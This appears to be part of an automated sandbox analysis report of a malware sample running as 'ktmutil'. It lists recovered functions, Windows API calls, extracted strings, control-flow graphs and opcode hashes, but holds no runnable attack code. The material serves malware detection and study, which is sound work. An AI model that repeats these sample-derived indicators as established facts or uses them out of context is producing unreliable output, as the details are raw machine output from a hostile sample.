
                                                • Executed
                                                • Not Executed
                                                control_flow_graph 346 190d48-190d6f call 1aa110 350 190d75-190dba call 194720 call 181410 call 1a1460 346->350 351 190d70 call 1aab20 346->351 359 190dda-190de0 350->359 360 190dbc-190dcb PostThreadMessageW 350->360 351->350 360->359 361 190dcd-190dd7 360->361 361->359
                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 00190DC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: )bvl$07c402-5$07c402-5
                                                • API String ID: 1836367815-996227108
                                                • Opcode ID: 1bb382ac99e2e117969a6b7b7ff2c9a69cb58911ca77f0a0a4c719dabe7b5848
                                                • Instruction ID: 26b82cfdd2e4f8d6594959420adb77427861046be767c1ad6f6787f3a2cd6d02
                                                • Opcode Fuzzy Hash: 1bb382ac99e2e117969a6b7b7ff2c9a69cb58911ca77f0a0a4c719dabe7b5848
                                                • Instruction Fuzzy Hash: FC11C2B2D0024C7AEB11AAD58C82DAF7B7CDF51394F048058F900A7641D7345E0687F1
                                                Function 00190C35 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 459 190c35-190ca2 460 190cc9-190ccf 459->460 461 190ca4 459->461 462 190cee-190cf2 460->462 463 190cd0-190ceb 460->463 461->460 464 190d3c 462->464 465 190cf4-190d14 462->465 463->462 467 190d9f-190dba 464->467 468 190d3e-190d47 464->468 465->463 466 190d16-190d17 465->466 471 190d19-190d1c 466->471 472 190d64-190d9e call 1aab20 call 194720 call 181410 call 1a1460 466->472 469 190dda-190de0 467->469 470 190dbc-190dcb PostThreadMessageW 467->470 470->469 473 190dcd-190dd7 470->473 474 190d1f-190d26 471->474 472->467 473->469 474->474 477 190d28-190d39 474->477 477->464
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 0-1844765358
                                                • Opcode ID: 93f2b516c6f34a662fc0b22232382f46d89ca921868007fbdb14976cd4e60deb
                                                • Instruction ID: a3aa20320031776ecd15af5608264140913041873368c5bfb0c924875dff993b
                                                • Opcode Fuzzy Hash: 93f2b516c6f34a662fc0b22232382f46d89ca921868007fbdb14976cd4e60deb
                                                • Instruction Fuzzy Hash: 0341E1739452496FDB039BA8CC829DEBBB8EF91314B184299E4549B142D325DD07CBD1
                                                Function 00190D50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 484 190d50-190d6f call 1aa110 487 190d75-190dba call 194720 call 181410 call 1a1460 484->487 488 190d70 call 1aab20 484->488 496 190dda-190de0 487->496 497 190dbc-190dcb PostThreadMessageW 487->497 488->487 497->496 498 190dcd-190dd7 497->498 498->496
                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 00190DC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 1836367815-1844765358
                                                • Opcode ID: 0312851da5a049d7c285c468280f46ea732cd954ace3ab867c1355badc4b913e
                                                • Instruction ID: d1e9643a4a5cd53461f5692adb0bde4b702faa4afa531db276b84f31611fde3f
                                                • Opcode Fuzzy Hash: 0312851da5a049d7c285c468280f46ea732cd954ace3ab867c1355badc4b913e
                                                • Instruction Fuzzy Hash: 9E0184B2D0024C7AEB11AAE48C82DEF7B7CDF55794F448069FA14B7141D7745E068BB1
                                                Function 001A2D40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 001A2E0B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 16c646962bfcac6c7e89313578ae33a01af71f2846a09960e3df77adc4b1dbb0
                                                • Instruction ID: 669e0fa06b45b6006e58949c2bc6e48ebb59791e48627a16ee56847e4ccc94db
                                                • Opcode Fuzzy Hash: 16c646962bfcac6c7e89313578ae33a01af71f2846a09960e3df77adc4b1dbb0
                                                • Instruction Fuzzy Hash: F3319CB5644704BBD728DF64C885FE7BBA8EB49300F00862DFA1D9B241D770BA44CBA0
                                                Function 0019C217 Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0019C1FF
                                                • FindClose.KERNELBASE(?), ref: 0019C20A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFileNext
                                                • String ID:
                                                • API String ID: 2066263336-0
                                                • Opcode ID: 61251cbbbc3701fce700209c83bf5d1be23c19b9e477b48159037cbaa2cfceb0
                                                • Instruction ID: 33c4d5b28636734f48ebf6f4cce60c5eb80bdd92a9efe8b85f55620c986b57d5
                                                • Opcode Fuzzy Hash: 61251cbbbc3701fce700209c83bf5d1be23c19b9e477b48159037cbaa2cfceb0
                                                • Instruction Fuzzy Hash: 25212D76614A0AEFCF02EBB4DC421DABB68FB11701B4445A8E080CB502E323C506C7D9
                                                Function 0019EE20 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0019EE37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 0d238c03cef40c90e93fcdfdfef43d6e1f248c200ff2362306076e114f7839d0
                                                • Instruction ID: b5dfeafacc5fbf4db07f84707c48061cfc54ee3e582d2eaeacc979f62354cb06
                                                • Opcode Fuzzy Hash: 0d238c03cef40c90e93fcdfdfef43d6e1f248c200ff2362306076e114f7839d0
                                                • Instruction Fuzzy Hash: 84312CB6A0060AAFDF00DFD8C8809EFB7B9BF88304B108559E505EB214D775EE45CBA1
                                                Function 00194720 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00194792
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction ID: d91c5a5bb758a041ccd204d4c11f503380b0f7c05d3d6a3f8f32ff0dfec2c675
                                                • Opcode Fuzzy Hash: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction Fuzzy Hash: 74011EB9D1020DBBDF14DAE4DC42F9EB7B89B55308F004195E90897241F731EB55CB91
                                                Function 001A8570 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00197FF3,00000010,?,?,?,00000044,?,00000010,00197FF3,?,?,?), ref: 001A85D3
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 41b7be0dd796f19bbba987c49d4c405ccc6914538a4c3070e92ac44fadb2ab97
                                                • Instruction ID: 4e19df765a16142c466df5f52ca1c31030b6da694061440b768fe46eec5edf96
                                                • Opcode Fuzzy Hash: 41b7be0dd796f19bbba987c49d4c405ccc6914538a4c3070e92ac44fadb2ab97
                                                • Instruction Fuzzy Hash: 7A01C0B2204208BFCB04DE89DC81EEB77ADAF8C714F018208BA09E3241D630F8518BA4
                                                Function 00189720 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00189765
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: db68cea5b33e48a9887a118ab88ffa2fc65f0fa28a0012da5220b9cfbcd1890c
                                                • Instruction ID: a37e90fbd50c7f2a906ae6cda80279cb3bba11aed6880ff05200c5cc6f64bcfc
                                                • Opcode Fuzzy Hash: db68cea5b33e48a9887a118ab88ffa2fc65f0fa28a0012da5220b9cfbcd1890c
                                                • Instruction Fuzzy Hash: 52F0653738060476D33075A99C02FE7768CDB95B61F14042AF60DEB1C1DA91B54147E4
                                                Function 0018971C Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00189765
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 6a1261c709bf769503d9941d8cc08363526acfdca6d5da9d256424ecf686ffd6
                                                • Instruction ID: 19e78c035fde1b2bf09ae58a9ea49c972261b0bc43244c75ae1a3f1d13bf4070
                                                • Opcode Fuzzy Hash: 6a1261c709bf769503d9941d8cc08363526acfdca6d5da9d256424ecf686ffd6
                                                • Instruction Fuzzy Hash: A8F06D7628070476D23076A98C02FE7768C9B95B91F140429FA09EB2C2DA96B9414BE8
                                                Function 001A8490 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(001934CE,00000000,001934CE,?,00000000,001934CE,00000000,001934CE,?,001A103C), ref: 001A84CC
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction ID: 40febb414caa7bc0764eaa7b0500908d662d37de9dcf33dd4ea18ecd0327b81a
                                                • Opcode Fuzzy Hash: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction Fuzzy Hash: 0CE065B2200204BBD610EF99EC41FDB37ACEFC9710F008019F908A7242DB70BA118BB4
                                                Function 001A84E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9DBC03FC,00000007,00000000,00000004,00000000,00193FFE,000000F4,?,?,?,?,?), ref: 001A851C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction ID: 4be5285a64d8498d8b743956ab94a67b71def68a8f03a976eaf6297f39474ee3
                                                • Opcode Fuzzy Hash: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction Fuzzy Hash: 91E0E5B6200608BBDA14EE99DC85FDB77ACEFC9724F004419F909A7242D770B9518BB5
                                                Function 00198030 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0019805C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 0d38490eea973d5cebe6d2d7c07c676d77f8ac72a32eaa9a95ea0a4ea9c6e7fd
                                                • Instruction ID: 8c7ba46c351322aec55be35af1e7f0e78fb65a182b489a281e0691323ef978d6
                                                • Opcode Fuzzy Hash: 0d38490eea973d5cebe6d2d7c07c676d77f8ac72a32eaa9a95ea0a4ea9c6e7fd
                                                • Instruction Fuzzy Hash: 3EE048751403046AEB2465689C45B7637585749B28F2C4660B95C9B1C1EA75F9014554
                                                Function 00197E40 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00191C50,001A6F87,001A4867,?), ref: 00197E73
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 62b5edb83e67690a41ff4d8456c1f6fa38c588b013ce707ce9f25535b620a960
                                                • Instruction ID: dfb89dd5d3045f4052e3d7192d5ebb9c5d6abad53622535f069b98ccb4a8a5b9
                                                • Opcode Fuzzy Hash: 62b5edb83e67690a41ff4d8456c1f6fa38c588b013ce707ce9f25535b620a960
                                                • Instruction Fuzzy Hash: 90D05E766803057BFA10B6F48C03F2A328CAB14754F044464B908E72C3EE59F5014AA9
                                                Function 02B92C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f3196598f3171fd671bedd456c93c79c411c33db585715228005f9544055dc11
                                                • Instruction ID: abdcaf56e016b55f07d55b00be20eb5c542de5eeb482da1004a46bab4b6eb2f2
                                                • Opcode Fuzzy Hash: f3196598f3171fd671bedd456c93c79c411c33db585715228005f9544055dc11
                                                • Instruction Fuzzy Hash: 7DB09B72D055C5D5DE11E7604A087177910A7D0701F15C0B1D2130692F4738D1D1E175

                                                Non-executed Functions

                                                Function 02A10548 Relevance: .1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588700512.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2a10000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63dc725e25436956f5d6451f19ded2231a0730a892001d4122b14db1ee574c6f
                                                • Instruction ID: 153272cfe87938ce4cd0f58091862c17e1b708c9029f3b6dca330009950eab6b
                                                • Opcode Fuzzy Hash: 63dc725e25436956f5d6451f19ded2231a0730a892001d4122b14db1ee574c6f
                                                • Instruction Fuzzy Hash: AA41E67165CB1D4FD368AF699081676B2E2FB85320F10462EDD9AC3252EF70D4468785
                                                Function 02A1B859 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588700512.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2a10000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3558027158
                                                • Opcode ID: c406cc19488b8a67e3990893c1588120ade60211e3e9fb244e2a84437ef2cc18
                                                • Instruction ID: 9d9dbe06ffb7c996b59b4efcb03ed1a45cf27a1498324cc5e74f87c4262af5f0
                                                • Opcode Fuzzy Hash: c406cc19488b8a67e3990893c1588120ade60211e3e9fb244e2a84437ef2cc18
                                                • Instruction Fuzzy Hash: 499150F04082988AC7158F55A0612AFFFB1EBC6305F15856DE7E6BB243C3BE8905CB95
                                                Function 02B92890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: f77b07517ef7ae92724c436f1a09ebd912739e65a261ab014d07314df71b541f
                                                • Instruction ID: 4d7125aa9735e19ee14d9f6b5654263e9e63e0bb7fdfb5bc905466a00a337629
                                                • Opcode Fuzzy Hash: f77b07517ef7ae92724c436f1a09ebd912739e65a261ab014d07314df71b541f
                                                • Instruction Fuzzy Hash: CB5184B6E0411A7FDF20DF688890A7EF7B8FB08204B5485B9E995D7641D734EA448BA0
                                                Function 02C02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 4ca82ff2caa127024529d4fa4afda487167976bf5deb2c6011431c3f614ee9f6
                                                • Instruction ID: bcdc6ca3ab612442a122cb76b987891a6a3ba8bc6c75bb70bb07825fd47b540f
                                                • Opcode Fuzzy Hash: 4ca82ff2caa127024529d4fa4afda487167976bf5deb2c6011431c3f614ee9f6
                                                • Instruction Fuzzy Hash: AD51F771A00645AEDF30DF9CC8E497FB7F9EB84204B14849AE896D7681DB74EA40CB61
                                                Function 02B87630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02BC4742
                                                • ExecuteOptions, xrefs: 02BC46A0
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02BC4725
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02BC46FC
                                                • Execute=1, xrefs: 02BC4713
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02BC4787
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02BC4655
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 9256f7837925279f1b780b807a13f9072fd58da5ce6601fdb7bfd3f6c567c1ef
                                                • Instruction ID: 2f1c3b949746e83ebd4b97a33a3a353864a92892dd99ac6be2229df633eac059
                                                • Opcode Fuzzy Hash: 9256f7837925279f1b780b807a13f9072fd58da5ce6601fdb7bfd3f6c567c1ef
                                                • Instruction Fuzzy Hash: F1512939A402196BEF11BBA4DC95FAAB7B9EF04308F2400E9E50DA7190EF709A45DF50
                                                Function 02A12C37 Relevance: 13.8, Strings: 11, Instructions: 64COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588700512.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2a10000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C_ZP$GVKG$GZ\]$RCC_$REZU$RGZ\$R]TV$VKP[$ZPRG$Z^RT$_ZPR
                                                • API String ID: 0-4216276281
                                                • Opcode ID: b359dc9139f1e1141bfc5e491422198491be49e9c1df6680fd5360b8984502ba
                                                • Instruction ID: 25ab94083820e55f4a1ea9ca3b200b74006c1eb06d77cb7eadda6e8b6508c2ed
                                                • Opcode Fuzzy Hash: b359dc9139f1e1141bfc5e491422198491be49e9c1df6680fd5360b8984502ba
                                                • Instruction Fuzzy Hash: 523125B095438CEFCB119F80D5846DDBBB1FB0470AF8140A9EA6A6F241C771865ACF89
                                                Function 02B9B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: f5ab70365204f68532e854cec8014476d50b38977c048912124bcda453cb4c94
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 28819070E052499FDF24CF68E8917FEBBB2EF45318F1882A9D861A7291C735A840CB51
                                                Function 02C020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: e37e684d164639ca9333ac988df2661110b49524b8374afb9e24888c8ce5b4ac
                                                • Instruction ID: 82cc76f32e4085f7951b336ea53a5a9cccb35290e3288f67dfbe18b8d0012de7
                                                • Opcode Fuzzy Hash: e37e684d164639ca9333ac988df2661110b49524b8374afb9e24888c8ce5b4ac
                                                • Instruction Fuzzy Hash: 69215176E00119ABDB10DF79CC84AAEBBF9AF84744F040166ED45E3240EB30DE019BA1
                                                Function 02B7F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02BC02E7
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02BC02BD
                                                • RTL: Re-Waiting, xrefs: 02BC031E
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
